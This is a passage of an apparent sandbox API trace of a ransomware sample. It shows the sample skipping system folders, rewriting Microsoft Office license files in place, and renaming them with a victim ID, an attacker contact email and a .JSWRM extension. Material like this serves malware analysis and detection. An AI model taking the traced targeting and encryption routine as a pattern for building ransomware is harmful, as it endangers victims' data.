lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5120, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5120, lpOverlapped=0x0) returned 1 [0108.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.463] CloseHandle (hObject=0x45c) returned 1 [0108.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0108.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0108.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0108.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0108.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0108.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0108.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0108.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0108.464] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0108.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0108.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0108.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0108.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0108.465] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9d4b270, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9d4b270, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea12b043, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdR_Retail-ul-oob.xrm-ms", cAlternateFileName="PRF1D9~1.XRM")) returned 1 [0108.516] lstrcmpiW (lpString1="ProjectStdR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0108.516] lstrcmpiW (lpString1="ProjectStdR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0108.516] lstrcmpiW (lpString1="ProjectStdR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0108.516] lstrcmpiW (lpString1="ProjectStdR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0108.516] lstrcmpiW (lpString1="ProjectStdR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0108.516] lstrcmpiW (lpString1="ProjectStdR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0108.516] lstrcmpiW (lpString1="ProjectStdR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0108.517] lstrcmpiW (lpString1="ProjectStdR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.517] lstrcmpiW (lpString1="ProjectStdR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0108.517] lstrcmpiW (lpString1="ProjectStdR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0108.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0108.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Retail-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Retail-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0108.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0108.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0108.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Retail-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Retail-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0108.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0108.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0108.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0108.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0108.517] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.518] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11596) returned 1 [0108.518] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0108.519] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0108.521] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.521] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0108.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.521] CloseHandle (hObject=0x45c) returned 1 [0108.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0108.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0108.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0108.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0108.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0108.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0108.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0108.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0108.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0108.522] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0108.522] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0108.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0108.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0108.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.523] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9cb2914, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9cb2914, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9d714db, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de5, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdR_Retail-ul-phn.xrm-ms", cAlternateFileName="PRCF3B~1.XRM")) returned 1 [0108.523] lstrcmpiW (lpString1="ProjectStdR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0108.524] lstrcmpiW (lpString1="ProjectStdR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0108.524] lstrcmpiW (lpString1="ProjectStdR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0108.524] lstrcmpiW (lpString1="ProjectStdR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0108.524] lstrcmpiW (lpString1="ProjectStdR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0108.524] lstrcmpiW (lpString1="ProjectStdR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0108.524] lstrcmpiW (lpString1="ProjectStdR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0108.524] lstrcmpiW (lpString1="ProjectStdR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.524] lstrcmpiW (lpString1="ProjectStdR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0108.524] lstrcmpiW (lpString1="ProjectStdR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0108.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0108.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Retail-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Retail-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0108.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0108.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0108.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Retail-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0108.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Retail-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0108.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0108.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0108.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0108.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0108.524] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.525] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19941) returned 1 [0108.525] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0108.525] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0108.528] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.528] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0108.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.528] CloseHandle (hObject=0x45c) returned 1 [0108.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0108.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0108.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0108.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0108.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0108.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0108.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0108.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0108.529] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0108.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0108.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0108.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0108.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.530] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9c40201, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9c40201, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9cd8b66, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a8e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdVL_KMS_Client-ppd.xrm-ms", cAlternateFileName="PR435D~1.XRM")) returned 1 [0108.530] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ppd.xrm-ms", lpString2=".") returned 1 [0108.530] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ppd.xrm-ms", lpString2="..") returned 1 [0108.530] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ppd.xrm-ms", lpString2="...") returned 1 [0108.530] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ppd.xrm-ms", lpString2="windows") returned -1 [0108.530] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ppd.xrm-ms", lpString2="recovery") returned -1 [0108.530] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ppd.xrm-ms", lpString2="perflogs") returned 1 [0108.530] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0108.530] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.530] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ppd.xrm-ms", lpString2="system volume information") returned -1 [0108.530] lstrcmpiW (lpString1="ProjectStdVL_KMS_Client-ppd.xrm-ms", lpString2="msocache") returned 1 [0108.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0108.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_KMS_Client-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0108.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_KMS_Client-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0108.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0108.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0108.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_KMS_Client-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0108.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_KMS_Client-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0108.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0108.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0108.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0108.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0108.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_kms_client-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, 